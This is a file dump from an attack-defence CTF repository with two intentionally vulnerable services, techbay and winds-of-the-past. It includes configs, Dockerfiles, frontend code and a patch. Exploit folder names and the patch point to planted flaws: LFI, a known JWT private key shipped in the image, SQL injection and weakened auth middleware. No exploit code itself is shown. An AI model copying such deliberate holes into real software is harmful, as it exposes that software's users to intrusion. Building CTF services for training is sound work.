/techbay/dist/backend-node/src/types/helper.type.ts: -------------------------------------------------------------------------------- 1 | import express from "express"; 2 | import {UserInfo} from "./trading.type"; 3 | 4 | export type RequestWithToken = express.Request & {user: UserInfo}; -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/types/request.type.ts: -------------------------------------------------------------------------------- 1 | export interface Request { 2 | id: number; 3 | userId: number; 4 | offerId: number; 5 | timestamp: Date; 6 | } 7 | 8 | export function requestFromDb(dbObject: any): Request { 9 | return { 10 | id: dbObject.id, 11 | userId: dbObject.user_id, 12 | offerId: dbObject.offer_id, 13 | timestamp: new Date(dbObject.timestamp), 14 | } 15 | } -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/types/trading.type.ts: -------------------------------------------------------------------------------- 1 | export interface NewOffer { 2 | name: string; 3 | description: string; 4 | picture: string | undefined; 5 | } 6 | 7 | export interface Offer { 8 | id: number; 9 | name: string; 10 | description: string; 11 | picture: string; 12 | timestamp: Date; 13 | isRequestedByMe: boolean; 14 | creator: UserInfo; 15 | owner: UserInfo | undefined; 16 | } 17 | 18 | export interface UserInfo { 19 | userId: number; 20 | username: string; 21 | displayname: string; 22 | } 23 | 24 | export interface PageConfig { 25 | page: number | undefined; 26 | nameOrder: Order | undefined; 27 | creationOrder: Order | undefined; 28 | limit: number | undefined; 29 | } 30 | 31 | export enum Order { 32 | ASC = 'asc', 33 | DESC = 'desc' 34 | } -------------------------------------------------------------------------------- /techbay/dist/backend-node/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es6", 4 | "module": "commonjs", 5 | "outDir": "./build", 6 | "strict": true, 7 | "esModuleInterop": true 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /techbay/dist/backend-rust/backend-rust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/backend-rust/backend-rust -------------------------------------------------------------------------------- /techbay/dist/backend-rust/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt update 4 | RUN apt install -y libpq-dev 5 | 6 | RUN groupadd ubuntu && useradd -g ubuntu -u 1001 ubuntu 7 | 8 | WORKDIR /app 9 | 10 | ADD backend-rust private.ke[y] ./ 11 | RUN chmod +x backend-rust 12 | 13 | RUN mkdir /app/data 14 | 15 | RUN chown -R ubuntu:ubuntu /app 16 | 17 | USER ubuntu 18 | EXPOSE 3030 19 | 20 | ENTRYPOINT ["./backend-rust"] -------------------------------------------------------------------------------- /techbay/dist/database/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM postgres:14.5 2 | 3 | COPY schema.sql /docker-entrypoint-initdb.d/schema.sql 4 | 5 | USER postgres 6 | EXPOSE 5432 -------------------------------------------------------------------------------- /techbay/dist/frontend/.dockerignore: -------------------------------------------------------------------------------- 1 | .idea 2 | .vscode 3 | node_modules 4 | .gitignore -------------------------------------------------------------------------------- /techbay/dist/frontend/.eslintrc.cjs: -------------------------------------------------------------------------------- 1 | /* eslint-env node */ 2 | require("@rushstack/eslint-patch/modern-module-resolution"); 3 | 4 | module.exports = { 5 | "root": true, 6 | "extends": [ 7 | "plugin:vue/vue3-essential", 8 | "eslint:recommended", 9 | "@vue/eslint-config-typescript/recommended", 10 | "@vue/eslint-config-prettier" 11 | ] 12 | } 13 | -------------------------------------------------------------------------------- /techbay/dist/frontend/.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | pnpm-debug.log* 8 | lerna-debug.log* 9 | 10 | node_modules 11 | .DS_Store 12 | dist 13 | dist-ssr 14 | coverage 15 | *.local 16 | 17 | /cypress/videos/ 18 | /cypress/screenshots/ 19 | 20 | # Editor directories and files 21 | .vscode/* 22 | !.vscode/extensions.json 23 | .idea 24 | *.suo 25 | *.ntvs* 26 | *.njsproj 27 | *.sln 28 | *.sw? 29 | 30 | typescript-fetch-client-generated.zip 31 | -------------------------------------------------------------------------------- /techbay/dist/frontend/.prettierrc: -------------------------------------------------------------------------------- 1 | {"printWidth":100,"tabWidth":2,"useTabs":false,"semi":true,"singleQuote":true,"trailingComma":"all","bracketSpacing":true,"jsxBracketSameLine":true} -------------------------------------------------------------------------------- /techbay/dist/frontend/.vscode/extensions.json: -------------------------------------------------------------------------------- 1 | { 2 | "recommendations": ["Vue.volar", "Vue.vscode-typescript-vue-plugin"] 3 | } 4 | -------------------------------------------------------------------------------- /techbay/dist/frontend/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:16 as builder 2 | 3 | WORKDIR /app 4 | 5 | COPY ./package.json . 6 | COPY ./yarn.lock . 7 | 8 | RUN yarn install 9 | 10 | ADD index.html tsconfig.config.json tsconfig.json vite.config.ts env.d.ts ./ 11 | ADD src/ ./src/ 12 | ADD public/ ./public/ 13 | 14 | RUN yarn run build 15 | 16 | FROM alpine:3.16.2 17 | 18 | RUN apk add thttpd 19 | 20 | RUN adduser -D static 21 | WORKDIR /home/static 22 | 23 | COPY --from=builder /app/dist/ . 24 | 25 | RUN chown -R static:static /home/static 26 | 27 | USER static 28 | 29 | CMD ["thttpd", "-D", "-h", "0.0.0.0", "-p", "8080", "-d", "/home/static", "-u", "static", "-l", "-", "-M", "60"] 30 | 31 | EXPOSE 8080 32 | -------------------------------------------------------------------------------- /techbay/dist/frontend/env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | -------------------------------------------------------------------------------- /techbay/dist/frontend/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Techbay 11 | 12 | 13 |
14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /techbay/dist/frontend/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/frontend/public/favicon.ico -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/.gitignore: -------------------------------------------------------------------------------- 1 | wwwroot/*.js 2 | node_modules 3 | typings 4 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/.swagger-codegen/VERSION: -------------------------------------------------------------------------------- 1 | 2.4.27 -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/custom.d.ts: -------------------------------------------------------------------------------- 1 | declare module 'portable-fetch'; 2 | declare module 'url'; -------------------------------------------------------------------------------- /techbay/dist/frontend/src/api/generated/index.ts: -------------------------------------------------------------------------------- 1 | // tslint:disable 2 | /** 3 | * TechBay 4 | * No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) 5 | * 6 | * OpenAPI spec version: 1.0.0 7 | * 8 | * 9 | * NOTE: This class is auto generated by the swagger code generator program. 10 | * https://github.com/swagger-api/swagger-codegen.git 11 | * Do not edit the class manually. 12 | */ 13 | 14 | 15 | export * from "./api"; 16 | export * from "./configuration"; 17 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/assets/logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/assets/techbay-logo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/frontend/src/assets/techbay-logo.ico -------------------------------------------------------------------------------- /techbay/dist/frontend/src/assets/techbay.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/dist/frontend/src/assets/techbay.jpg -------------------------------------------------------------------------------- /techbay/dist/frontend/src/components/Spinner.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 9 | 23 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/main.ts: -------------------------------------------------------------------------------- 1 | import { createApp } from 'vue'; 2 | import App from './App.vue'; 3 | import router from './router'; 4 | import Equal from 'equal-vue'; 5 | import 'equal-vue/dist/style.css'; 6 | 7 | const app = createApp(App).use(Equal); 8 | 9 | app.use(router); 10 | 11 | app.mount('#app'); 12 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/authentication.service.ts: -------------------------------------------------------------------------------- 1 | import { authenticationApi } from '@/api'; 2 | import type { UserInfo } from '@/api/generated'; 3 | import { sha3_512 } from 'js-sha3'; 4 | 5 | export async function login(username: string, password: string): Promise { 6 | const hashedPassword = sha3_512(password); 7 | return authenticationApi().login({ username, hashedPassword }); 8 | } 9 | 10 | export async function register( 11 | username: string, 12 | password: string, 13 | passport: string, 14 | ): Promise { 15 | const hashedPassword = sha3_512(password); 16 | await authenticationApi().register({ 17 | username: username, 18 | hashedPassword: hashedPassword, 19 | passport, 20 | }); 21 | } 22 | 23 | export async function getCurrentUser(): Promise { 24 | return authenticationApi().getCurrentUser(); 25 | } 26 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/index.ts: -------------------------------------------------------------------------------- 1 | import * as authenticationService from './authentication.service'; 2 | import * as profileService from './profile.service'; 3 | import * as requestService from './request.service'; 4 | import * as tradingService from './trading.service'; 5 | import * as spinnerService from './spinner.service'; 6 | 7 | export const AuthenticationService = authenticationService; 8 | export const ProfileService = profileService; 9 | export const RequestService = requestService; 10 | export const TradingService = tradingService; 11 | export const SpinnerService = spinnerService; 12 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/message-service.ts: -------------------------------------------------------------------------------- 1 | export interface MessageService { 2 | danger: (options: { text: string; duration: number }) => void; 3 | success: (options: { text: string; duration: number }) => void; 4 | primary: (options: { text: string; duration: number }) => void; 5 | warning: (options: { text: string; duration: number }) => void; 6 | } 7 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/profile.service.ts: -------------------------------------------------------------------------------- 1 | import { profileApi } from '@/api'; 2 | import type { ProfileInfo, ProfileInfoCurrentUser } from '@/api/generated'; 3 | 4 | export async function getProfileOfCurrentUser(): Promise { 5 | return profileApi().getProfile(); 6 | } 7 | 8 | export async function getProfile(userId: number): Promise { 9 | return profileApi().getProfileByUserId(userId); 10 | } 11 | 12 | export async function updateProfile(profileInfo: ProfileInfoCurrentUser): Promise { 13 | await profileApi().updateProfile(profileInfo); 14 | } 15 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/request.service.ts: -------------------------------------------------------------------------------- 1 | import { requestApi } from '@/api'; 2 | import type { Request } from '@/api/generated'; 3 | 4 | export async function getRequestsByOthers(): Promise { 5 | return requestApi().getRequestsByOthers(); 6 | } 7 | 8 | export async function getRequestsByMe(): Promise { 9 | return requestApi().getRequestsByMe(); 10 | } 11 | 12 | export async function requestOffer(offerId: number): Promise { 13 | await requestApi().requestOffer(offerId); 14 | } 15 | 16 | export async function acceptRequest(id: number): Promise { 17 | await requestApi().acceptRequest(id); 18 | } 19 | 20 | export async function takebackRequest(id: number): Promise { 21 | await requestApi().takebackRequest(id); 22 | } 23 | 24 | export async function denyRequest(id: number): Promise { 25 | await requestApi().denyRequest(id); 26 | } 27 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/spinner.service.ts: -------------------------------------------------------------------------------- 1 | export function hide() { 2 | document.querySelector('div.spinner-background')?.setAttribute('style', 'display: none'); 3 | } 4 | 5 | export function show() { 6 | document.querySelector('div.spinner-background')?.removeAttribute('style'); 7 | } 8 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/services/time.service.ts: -------------------------------------------------------------------------------- 1 | export function dateToDifferenceString(timestamp: Date): string { 2 | const currentDate = new Date(); 3 | const diff = (currentDate.getTime() - timestamp.getTime()) / 1000; 4 | if (diff < 60) { 5 | return `${diff.toFixed(0)} s ago`; 6 | } else if (diff < 60 * 60) { 7 | return `${(diff / 60).toFixed(0)} m ago`; 8 | } else if (diff < 60 * 60 * 60) { 9 | return `${(diff / 60 / 60).toFixed(0)} h ago`; 10 | } else if (diff < 60 * 60 * 60 * 24) { 11 | return `${(diff / 60 / 60 / 60).toFixed(0)} d ago`; 12 | } 13 | return `long ago`; 14 | } 15 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/stores/user-store.ts: -------------------------------------------------------------------------------- 1 | import { reactive } from 'vue'; 2 | import type { UserInfo } from '@/api/generated'; 3 | 4 | interface UserStoreData { 5 | user: UserInfo | undefined; 6 | isLoggedIn: boolean; 7 | token: string | undefined; 8 | } 9 | 10 | export const userStore = reactive({ 11 | user: undefined, 12 | isLoggedIn: false, 13 | token: undefined, 14 | }); 15 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/views/AdminView.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/views/MyRequestsView.vue: -------------------------------------------------------------------------------- 1 | 12 | 13 | 16 | -------------------------------------------------------------------------------- /techbay/dist/frontend/src/views/RequestsView.vue: -------------------------------------------------------------------------------- 1 | 12 | 13 | 16 | -------------------------------------------------------------------------------- /techbay/dist/frontend/tsconfig.config.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "@vue/tsconfig/tsconfig.node.json", 3 | "include": ["vite.config.*", "vitest.config.*", "cypress.config.*"], 4 | "compilerOptions": { 5 | "composite": true, 6 | "types": ["node"] 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /techbay/dist/frontend/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "@vue/tsconfig/tsconfig.web.json", 3 | "include": ["env.d.ts", "src/**/*", "src/**/*.vue"], 4 | "compilerOptions": { 5 | "baseUrl": ".", 6 | "paths": { 7 | "@/*": ["./src/*"] 8 | }, 9 | "strictPropertyInitialization": false 10 | }, 11 | 12 | "references": [ 13 | { 14 | "path": "./tsconfig.config.json" 15 | } 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /techbay/dist/frontend/vite.config.ts: -------------------------------------------------------------------------------- 1 | import { fileURLToPath, URL } from 'url' 2 | 3 | import { defineConfig } from 'vite' 4 | import vue from '@vitejs/plugin-vue' 5 | 6 | // https://vitejs.dev/config/ 7 | export default defineConfig({ 8 | plugins: [vue()], 9 | resolve: { 10 | alias: { 11 | '@': fileURLToPath(new URL('./src', import.meta.url)) 12 | } 13 | } 14 | }) 15 | -------------------------------------------------------------------------------- /techbay/dist/proxy/Caddyfile: -------------------------------------------------------------------------------- 1 | :8080 2 | log 3 | 4 | reverse_proxy techbay-frontend:8080 5 | 6 | reverse_proxy /offer techbay-backend-node:8080 7 | reverse_proxy /offer/* techbay-backend-node:8080 8 | 9 | reverse_proxy /profile techbay-backend-node:8080 10 | reverse_proxy /profile/* techbay-backend-node:8080 11 | 12 | reverse_proxy /request techbay-backend-node:8080 13 | reverse_proxy /request/* techbay-backend-node:8080 14 | 15 | handle_path /auth/* { 16 | rewrite * /api/auth{path} 17 | reverse_proxy techbay-backend-rust:3030 18 | } 19 | -------------------------------------------------------------------------------- /techbay/dist/proxy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM caddy:2-alpine 2 | COPY Caddyfile /etc/caddy/Caddyfile 3 | RUN adduser caddy -H -D 4 | USER caddy 5 | CMD ["caddy", "run", "--config", "/etc/caddy/Caddyfile", "--adapter", "caddyfile"] 6 | -------------------------------------------------------------------------------- /techbay/exploits/.gitignore: -------------------------------------------------------------------------------- 1 | .idea -------------------------------------------------------------------------------- /techbay/exploits/flagstore1/exploit-hidden-lfi/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pytesseract 3 | Pillow -------------------------------------------------------------------------------- /techbay/exploits/flagstore1/exploit-jwt-known-private-key/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pytesseract 3 | pyjwt 4 | Pillow -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-hidden-api/requirements.txt: -------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-jwt-known-private-key/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-jwt-known-private-key/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": "exploit.js", 3 | "dependencies": { 4 | "jsonwebtoken": "^8.5.1", 5 | "node-fetch": "v2" 6 | }, 7 | "name": "exploit1-flagstore2", 8 | "version": "1.0.0", 9 | "license": "MIT", 10 | "private": true 11 | } 12 | -------------------------------------------------------------------------------- /techbay/exploits/flagstore2/exploit-sqli/requirements.txt: -------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /techbay/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=techbay 2 | -------------------------------------------------------------------------------- /techbay/patches/flagstore2-vulnerability1.patch: -------------------------------------------------------------------------------- 1 | diff --git a/backend-node/src/controllers/profile.controller.ts b/backend-node/src/controllers/profile.controller.ts 2 | index 8d13990..36ba0e4 100644 3 | --- a/backend-node/src/controllers/profile.controller.ts 4 | +++ b/backend-node/src/controllers/profile.controller.ts 5 | @@ -51,7 +51,7 @@ controller.post( 6 | 7 | controller.post( 8 | "/status/visbility", 9 | - authMiddleware2, 10 | + authMiddleware, 11 | body('visibility').isBoolean(), 12 | async (req, res) => { 13 | if (!validationResult(req).isEmpty()) { 14 | -------------------------------------------------------------------------------- /techbay/techbay.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/techbay.png -------------------------------------------------------------------------------- /winds-of-the-past/.gitignore: -------------------------------------------------------------------------------- 1 | dist/src/build 2 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | # set this to _checker 14 | ENV CTF_SERVICE winds-of-the-past_checker1 15 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} # ip, team, tick 10 | network_mode: host 11 | volumes: 12 | - checkerstate:/tmp 13 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | pwntools 2 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN apt-get update && apt-get install --yes --no-install-recommends \ 4 | gfortran 5 | 6 | RUN mkdir -p /checker 7 | WORKDIR /checker 8 | 9 | COPY requirements.txt /checker/requirements.txt 10 | RUN pip install -r requirements.txt 11 | 12 | COPY checksum.f /checker/checksum.f 13 | RUN gfortran /checker/checksum.f -fdec-structure -o /checker/checksum 14 | 15 | COPY checker.py /checker/checker.py 16 | 17 | USER ctf-checkermaster 18 | ENV CTF_CHECKERSCRIPT /checker/checker.py 19 | 20 | # set this to _checker 21 | ENV CTF_SERVICE winds-of-the-past_checker2 22 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | networks: 7 | gamenet: 8 | external: 9 | name: gamenet 10 | 11 | services: 12 | checker: 13 | build: . 14 | command: localhost 1 ${TICK} # ip, team, tick 15 | network_mode: host 16 | volumes: 17 | - checkerstate:/tmp 18 | -------------------------------------------------------------------------------- /winds-of-the-past/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | pwntools 2 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 as builder 2 | RUN apt-get update && apt-get install --yes --no-install-recommends \ 3 | cmake \ 4 | gfortran \ 5 | make 6 | 7 | RUN mkdir /src /build 8 | 9 | COPY src /src 10 | RUN cd /src/deps/fortran-unix && \ 11 | make clean linux 12 | RUN cd /build && \ 13 | cmake /src -DFORTRAN_UNIX_DIR=/src/deps/fortran-unix && \ 14 | make 15 | 16 | FROM ubuntu:20.04 17 | COPY run.sh /run.sh 18 | COPY cleanup-cron /etc/cron.d/cleanup-cron 19 | RUN apt-get update && \ 20 | apt-get install --yes --no-install-recommends \ 21 | cron \ 22 | libgfortran5 \ 23 | socat && \ 24 | useradd service && \ 25 | chmod u+s /usr/sbin/cron && \ 26 | crontab -u service /etc/cron.d/cleanup-cron && \ 27 | mkdir -p /data && \ 28 | chown service:service /data 29 | 30 | USER service 31 | COPY --from=builder /build/winds_of_the_past /service 32 | CMD /run.sh 33 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/README.md: -------------------------------------------------------------------------------- 1 | # Winds of the Past 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: the flag id corresponds to a username with a flag 6 | - Flagstore 2: the flag id identifies a turbine with a flag 7 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/cleanup-cron: -------------------------------------------------------------------------------- 1 | # Delete files not accessed for >30 minutes 2 | */5 * * * * /usr/bin/find /data -amin +30 -delete 3 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | data: 5 | 6 | services: 7 | winds-of-the-past: 8 | build: . 9 | user: service 10 | restart: always 11 | ports: 12 | - 10060:10060 13 | volumes: 14 | - data:/data 15 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/run.sh: -------------------------------------------------------------------------------- 1 | cron 2 | socat -T180 tcp-l:10060,reuseaddr,fork EXEC:/service,pty,stderr,echo=0 3 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0) 2 | project(winds_of_the_past Fortran) 3 | enable_language(Fortran) 4 | 5 | set(CMAKE_Fortran_FLAGS "-fdec-structure -Wall -fno-backtrace -fimplicit-none -no-pie") 6 | set(FORTRAN_UNIX_DIR "" CACHE STRING "Directory containing the fortran-unix dependency") 7 | 8 | add_executable(${PROJECT_NAME} 9 | main.f 10 | mod_bucket.f 11 | mod_crypto.f 12 | mod_consumption.f 13 | mod_turbine.f 14 | mod_user.f 15 | ) 16 | 17 | target_link_libraries(${PROJECT_NAME} 18 | "${FORTRAN_UNIX_DIR}/libfortran-unix.a" 19 | ) 20 | include_directories(${FORTRAN_UNIX_DIR}) 21 | 22 | set_target_properties(${PROJECT_NAME} PROPERTIES LINKER_LANGUAGE Fortran) 23 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/.gitignore: -------------------------------------------------------------------------------- 1 | # Distribution / packaging 2 | .xmake/ 3 | env/ 4 | build/ 5 | dist/ 6 | var/ 7 | 8 | # Other stuff 9 | *.swp 10 | *.mod 11 | *.o 12 | *.a 13 | *.so 14 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/LICENCE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2020, Philipp Engel 2 | 3 | Permission to use, copy, modify, and/or distribute this software for any purpose 4 | with or without fee is hereby granted, provided that the above copyright notice 5 | and this permission notice appear in all copies. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH 8 | REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND 9 | FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, 10 | INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS 11 | OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER 12 | TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF 13 | THIS SOFTWARE. 14 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/examples/pid/pid.f90: -------------------------------------------------------------------------------- 1 | ! pid.f90 2 | ! 3 | ! Example program that outputs the process id. 4 | ! 5 | ! Author: Philipp Engel 6 | ! Licence: ISC 7 | program main 8 | use, intrinsic :: iso_c_binding 9 | use :: unix 10 | implicit none 11 | 12 | print '("PID: ", i0)', c_getpid() 13 | end program main 14 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/examples/signal/signal.f90: -------------------------------------------------------------------------------- 1 | ! signal.f90 2 | ! 3 | ! Example program that registers a signal handler for SIGINT. 4 | ! 5 | ! Author: Philipp Engel 6 | ! Licence: ISC 7 | program main 8 | use, intrinsic :: iso_c_binding 9 | use :: unix 10 | implicit none 11 | integer :: rc 12 | type(c_funptr) :: ptr 13 | 14 | ! Register signal handler. 15 | ptr = c_signal(SIGINT, c_funloc(sigint_handler)) 16 | 17 | print '(a)', 'Press CTRL + C to send SIGINT.' 18 | 19 | do 20 | print '(a)', 'zzz ...' 21 | rc = c_usleep(10**6) 22 | end do 23 | contains 24 | subroutine sigint_handler(signum) bind(c) 25 | !! Signal handler for SIGINT. 26 | integer(kind=c_int), intent(in), value :: signum 27 | 28 | print '(a, i0, a)', 'Received SIGINT (', signum, '). Terminating ...' 29 | stop 30 | end subroutine sigint_handler 31 | end program main 32 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_ioctl.F90: -------------------------------------------------------------------------------- 1 | ! unix_ioctl.F90 2 | module unix_ioctl 3 | use, intrinsic :: iso_c_binding 4 | implicit none 5 | private 6 | 7 | public :: c_ioctl 8 | 9 | interface 10 | ! int ioctl(int fd, int cmd, int arg) 11 | function c_ioctl(fd, request, arg) bind(c, name='ioctl') 12 | import :: c_int, c_ptr 13 | implicit none 14 | integer(kind=c_int), intent(in), value :: fd 15 | integer(kind=c_int), intent(in), value :: request 16 | type(c_ptr), intent(in), value :: arg 17 | integer(kind=c_int) :: c_ioctl 18 | end function c_ioctl 19 | end interface 20 | end module unix_ioctl 21 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_macro.c: -------------------------------------------------------------------------------- 1 | /* unix_macro.c */ 2 | #include 3 | 4 | /* Returns variable `errno` from `errno.h`. */ 5 | int error_number() 6 | { 7 | return errno; 8 | } 9 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_stdlib.F90: -------------------------------------------------------------------------------- 1 | ! unix_stdlib.F90 2 | module unix_stdlib 3 | use, intrinsic :: iso_c_binding 4 | implicit none 5 | private 6 | 7 | public :: c_exit 8 | public :: c_free 9 | 10 | interface 11 | ! void exit(int status) 12 | subroutine c_exit(status) bind(c, name='exit') 13 | import :: c_int 14 | implicit none 15 | integer(kind=c_int), intent(in), value :: status 16 | end subroutine c_exit 17 | 18 | ! void free(void *ptr) 19 | subroutine c_free(ptr) bind(c, name='free') 20 | import :: c_ptr 21 | implicit none 22 | type(c_ptr), intent(in), value :: ptr 23 | end subroutine c_free 24 | end interface 25 | end module unix_stdlib 26 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/deps/fortran-unix/src/unix_wait.F90: -------------------------------------------------------------------------------- 1 | ! unix_wait.F90 2 | module unix_wait 3 | use, intrinsic :: iso_c_binding 4 | use :: unix_types 5 | implicit none 6 | private 7 | 8 | public :: c_wait 9 | 10 | interface 11 | ! pid_t wait(int *stat_loc) 12 | function c_wait(stat_loc) bind(c, name='wait') 13 | import :: c_int, c_pid_t 14 | implicit none 15 | integer(kind=c_int), intent(out) :: stat_loc 16 | integer(kind=c_pid_t) :: c_wait 17 | end function c_wait 18 | end interface 19 | end module unix_wait 20 | -------------------------------------------------------------------------------- /winds-of-the-past/dist/src/mod_bucket.f: -------------------------------------------------------------------------------- 1 | MODULE mod_bucket 2 | CONTAINS 3 | 4 | FUNCTION calculate_bucket(str, num_buckets) 5 | INTEGER :: calculate_bucket 6 | INTEGER :: i, bucket 7 | CHARACTER(len=*),INTENT(IN) :: str 8 | INTEGER,INTENT(IN) :: num_buckets 9 | 10 | bucket = 0 11 | DO i = 1, LEN(str) 12 | bucket = bucket + ICHAR(str(i:i)) 13 | END DO 14 | calculate_bucket = MOD(bucket, num_buckets) 15 | 16 | RETURN 17 | END FUNCTION calculate_bucket 18 | END MODULE mod_bucket 19 | -------------------------------------------------------------------------------- /winds-of-the-past/exploits/winds_of_the_past.py: -------------------------------------------------------------------------------- 1 | import enum 2 | 3 | 4 | NUM_MODELNUMBERS = 5 5 | PORT = 10060 6 | 7 | 8 | class Menu(enum.Enum): 9 | EXIT = b"0" 10 | REGISTER_USER = b"1" 11 | LOGIN = b"2" 12 | SHOW_USER_DETAILS = b"3" 13 | SHOW_TURBINE_DETAILS = b"4" 14 | REGISTER_TURBINE = b"5" 15 | CALCULATE_CAPACITY = b"6" 16 | 17 | MENU_START = b"0. Exit" 18 | MENU_END = b"Select an option: " 19 | -------------------------------------------------------------------------------- /winds-of-the-past/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=winds-of-the-past 2 | PROTECTED_FILES=**/CMakeLists.txt;**/Makefile;cleanup-cron;run.sh 3 | -------------------------------------------------------------------------------- /winds-of-the-past/winds_of_the_past.png: -------------------------------------------------------------------------------- 